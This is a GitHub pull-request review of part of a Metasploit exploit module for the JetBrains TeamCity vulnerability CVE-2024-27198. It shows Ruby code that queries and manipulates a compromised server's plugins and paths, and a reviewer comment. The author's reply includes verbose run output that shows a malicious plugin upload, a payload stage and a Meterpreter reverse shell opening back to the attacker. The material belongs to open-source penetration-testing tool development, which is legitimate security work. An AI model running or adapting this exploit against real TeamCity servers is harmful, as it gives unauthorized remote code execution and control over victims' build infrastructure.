modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2024_27198.rb

```diff
@@ -0,0 +1,697 @@
+    }
+
+    platforms.each do |path, sep|
+      if (pos = restapi_load_path.index(path))
+        return [restapi_load_path[0, pos], sep]
+      end
+    end
+
+    print_warning('Failed to extract install path.')
+    nil
+  end
+
+  def get_data_dir_path(http_authorization)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'app', 'rest', 'server', 'dataDirectoryPath'),
+      'keep_cookies' => true,
+      'headers' => {
+        'Origin' => full_uri,
+        'Authorization' => http_authorization
+      }
+    )
+
+    unless res&.code == 200
+      print_warning('Failed to request data directory path.')
+      return nil
+    end
+
+    res.body
+  end
+
+  def get_build_number(http_authorization)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'app', 'rest', 'server'),
+      'keep_cookies' => true,
+      'headers' => {
+        'Origin' => full_uri,
+        'Authorization' => http_authorization
+      }
+    )
+
+    unless res&.code == 200
+      print_warning('Failed to request server information.')
+      return nil
+    end
+
+    xml_data = res.get_xml_document
+
+    server_data = xml_data.at('server')
+
+    server_data.attr('buildNumber')
+  end
+
+  def get_plugin_uuid(http_authorization, plugin_name)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'admin.html'),
+      'keep_cookies' => true,
+      'headers' => {
+        'Origin' => full_uri,
+        'Authorization' => http_authorization
+      },
+      'vars_get' => {
+        'item' => 'plugins'
+      }
+    )
+
+    unless res&.code == 200
+      print_warning('Failed to list all plugins.')
+      return nil
+    end
+
+    uuid_match = res.body.match(/'#{Regexp.quote(plugin_name)}', '([a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12})'/)
+
+    if uuid_match&.length != 2
+      print_warning('Failed to grep for plugin GUID')
+      return nil
+    end
+
+    uuid_match[1]
+  end
+
+  def delete_plugin(http_authorization, plugin_name)
+    plugin_uuid = get_plugin_uuid(http_authorization, plugin_name)
+
+    if plugin_uuid.nil?
+      print_warning('Failed to discover enabled plugin UUID')
+      return false
+    end
+
+    vprint_status("Enabled Plugin UUID: #{plugin_uuid}")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'plugins.html'),
+      'keep_cookies' => true,
+      'headers' => {
+        'Origin' => full_uri,
+        'Authorization' => http_authorization
+      },
+      'vars_post' => {
+        'action' => 'setEnabled',
+        'enabled' => 'false',
+        'uuid' => plugin_uuid
+      }
+    )
+
+    unless res&.code == 200
+      print_warning('Failed to disable the plugin.')
+      return false
+    end
+
+    plugin_uuid = get_plugin_uuid(http_authorization, plugin_name)
```

Comment:
Just checking, the plugin's UUID changes after being disabled? If not, we might be able to avoid calling `get_plugin_uuid` again here.

Reply:
Correct, the UUID changes between calls so we need to call this twice. If is set VERBOSE true and run the exploit we can see this being printed:

```
[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.TTBPUjM2b0tBT2wzOUZ4b0hsZFlCX1hNajJz.MjE3Nzc2N2ItNDI0Yy00MzdlLWEzN2UtZDIxYzAyOWVmM2U3
[*] Uploading plugin: C28NEkGt
[*] Sending stage (57971 bytes) to 192.168.86.43
[*] Target install path: /opt/TeamCity
[*] Target build number: 147512
[*] Target data directory path: /home/teamcity/.BuildServer
[*] Deleting the plugin...
[*] Enabled Plugin UUID: 77b71365-457a-4e44-90d6-a39c148cf26f
[+] Deleted /opt/TeamCity/work/Catalina/localhost/ROOT/TC_147512_C28NEkGt
[+] Deleted /home/teamcity/.BuildServer/system/caches/plugins.unpacked/C28NEkGt
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.43:58204) at 2024-03-13 09:15:02 +0000
[*] Disabled Plugin UUID: a446bddd-3e63-4df8-b845-876310480951
[*] Deleting the authentication token...
[!] This exploit may require manual cleanup of '/opt/TeamCity/webapps/ROOT/plugins/C28NEkGt' on the target
```

In the above case the UUID was `77b71365-457a-4e44-90d6-a39c148cf26f` and `a446bddd-3e63-4df8-b845-876310480951`.

I have added a comment in [b04e84e](https://github.com/rapid7/metasploit-framework/pull/18922/commits/b04e84ed999aa8c5a1730011aa92941f21f87114) to clarify this.